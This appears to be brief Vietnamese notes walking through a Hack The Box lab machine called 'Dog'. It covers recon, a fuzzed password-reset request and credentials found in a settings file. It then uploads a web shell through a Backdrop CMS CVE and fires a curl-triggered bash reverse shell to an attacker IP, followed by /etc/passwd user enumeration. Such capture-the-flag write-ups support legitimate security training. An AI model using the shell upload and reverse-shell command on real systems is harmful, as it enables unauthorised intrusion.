Dog machine

Footprint

Do nmap Vào site check dirb hoặc dirsearch Download git về

Hint ffuf

Dùng burpsuite capture request rồi thêm vô FFUF name file la login.txt

POST /?q=user/password HTTP/1.1
Host: 10.129.14.204
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://10.129.14.204
Connection: keep-alive
Referer: http://10.129.14.204/?q=user/password
Upgrade-Insecure-Requests: 1
Priority: u=0, i

name=root&form_build_id=form-l_7duj9H_Hs5SJ1uXh9p4u9Bcc82xtTympqVDkLa-LQ&form_id=user_pass&op=Reset+password

Tuy nhiên bị block Google backdropscan ,github và scan Tìm thông tin user backdropscan để scan user tìm được password setting.php source code grep -irl "htb" Google ra CVE Tạo file shell, sau đó dùng lệnh tar -czvf shell.tar.gz /shell

curl -G http://10.129.14.204/modules/shell/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.60/4444 0>&1"'

Trick 2 etc/passwd

cat /etc/passwd | grep 'sh$' cat /etc/passwd | grep 'sh$' |awk -F: '{print $1}' ls -la home

Footprint​

Hint ffuf​

Trick 2 etc/passwd​

Footprint

Hint ffuf

Trick 2 etc/passwd